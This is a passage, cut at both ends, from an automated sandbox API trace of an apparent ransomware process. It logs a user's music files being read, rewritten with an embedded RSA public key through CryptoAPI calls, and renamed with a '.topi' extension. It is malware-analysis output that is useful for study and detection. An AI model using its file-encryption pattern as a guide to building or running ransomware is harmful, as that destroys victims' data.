lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbf50 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.980] WriteFile (in: hFile=0x6a8, lpBuffer=0x316e2e0*, nNumberOfBytesToWrite=0x60a, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x316e2e0*, lpNumberOfBytesWritten=0x9ccfb14*=0x60a, lpOverlapped=0x0) returned 1 [0098.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e2e0 | out: hHeap=0x680000) returned 1 [0098.981] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x60f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.981] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.981] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.981] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.982] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.982] CloseHandle (hObject=0x6a8) returned 1 [0098.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0098.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e0) returned 0x31cf750 [0098.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0098.983] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\hR kmfu2wNIUHpsVI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\-b6nu6h6 u_8u\\hr kmfu2wniuhpsvi.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\hR kmfu2wNIUHpsVI.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\-b6nu6h6 u_8u\\hr kmfu2wniuhpsvi.wav.topi")) returned 1 [0098.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.983] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.985] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa5e0, ftCreationTime.dwHighDateTime=0x1d5bd0d, ftLastAccessTime.dwLowDateTime=0x952223d0, ftLastAccessTime.dwHighDateTime=0x1d5c409, ftLastWriteTime.dwLowDateTime=0x952223d0, ftLastWriteTime.dwHighDateTime=0x1d5c409, nFileSizeHigh=0x0, nFileSizeLow=0xfc4b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uXjL4zN_U1orQ.m4a", cAlternateFileName="UXJL4Z~1.M4A")) returned 1 [0098.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x106) returned 0x31919a8 [0098.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.985] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\uXjL4zN_U1orQ.m4a") returned=".m4a" [0098.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\uXjL4zN_U1orQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\-b6nu6h6 u_8u\\uxjl4zn_u1orq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.985] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=64587) returned 1 [0098.985] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.988] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfc25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.988] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.989] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.989] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xfc4b, lpOverlapped=0x0) returned 1 [0098.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0098.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.989] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0098.990] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.990] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.990] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.991] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.991] GetLastError () returned 0x0 [0098.991] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.991] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0098.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.991] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.991] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.991] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc50) returned 0x9a06a00 [0098.992] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbf50 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbf98 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.992] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0098.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51c8 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e51b0 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191cf0 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.994] GetCurrentThreadId () returned 0x8c4 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fae80 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.994] GetCurrentThreadId () returned 0x8c4 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0098.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0098.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0098.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0098.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0098.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51e0 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, 